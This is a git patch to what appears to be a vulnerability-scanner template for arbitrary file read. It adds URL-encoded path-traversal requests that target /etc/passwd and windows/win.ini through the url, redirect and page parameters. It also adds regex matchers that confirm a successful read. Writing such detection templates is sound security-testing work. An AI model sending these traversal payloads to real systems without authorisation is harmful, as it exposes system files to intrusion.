From 471daf1bfd23a43cb275b322997b49f8c5f2bfe8 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Fri, 2 Oct 2020 22:22:52 +0530
Subject: [PATCH] Update arbitrary-file-read.yaml

---
 vulnerabilities/arbitrary-file-read.yaml | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/vulnerabilities/arbitrary-file-read.yaml b/vulnerabilities/arbitrary-file-read.yaml
index 83e28609ef..e1fb95913b 100644
--- a/vulnerabilities/arbitrary-file-read.yaml
+++ b/vulnerabilities/arbitrary-file-read.yaml
@@ -11,8 +11,19 @@ requests:
     path:
       - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
       - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+
+    matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "root:x"
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+        part: body
\ No newline at end of file